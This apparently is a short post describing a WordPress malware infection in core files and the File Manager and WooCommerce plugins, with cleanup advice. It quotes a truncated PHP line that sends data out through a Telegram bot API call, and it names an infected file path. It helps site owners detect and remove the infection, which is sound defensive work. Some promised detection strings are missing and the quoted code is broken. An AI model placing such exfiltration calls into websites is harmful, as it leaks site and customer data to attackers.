Conspiracy Revelation: 28.9.2020: I removed the Telegram APIs manually from all infected files…
“file_get_contents(“https://api.telegram.org/xxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=” . urlencode$”
“The malware looks to be infecting WordPress’ core files, “File Manager” and “WooCommerce” plugins for now, including the latest version of WordPress (5.5) and Woocommerce (4.4.1). The files that seem to be affected are:
wp-file-manager/lib/files/HhGFXU.php (and other randomly named .php files)
Expressions that can help to determine if your site is compromised are:
Since the code above is not hashed or obfuscated, it is extremely difficult to be scanned using a security plugin like wordfence or sucuri so manual intervention is advised.
Steps to resolve
Basic steps to resolve this is to replace all the wordpress core files with clean wp-admin and wp-includes folders and a fresh re-install of the woocommerce and wp file manager plugins. Always make sure to take a backup before attempting this.
Also, in no cases there should be any references of those strings anywhere in your website’s files or database (with the exception of when using the official Telegram plugin for the 2nd string).
Lastly, it is recommended to check on newly created WordPress usernames that might be injected into the database as well.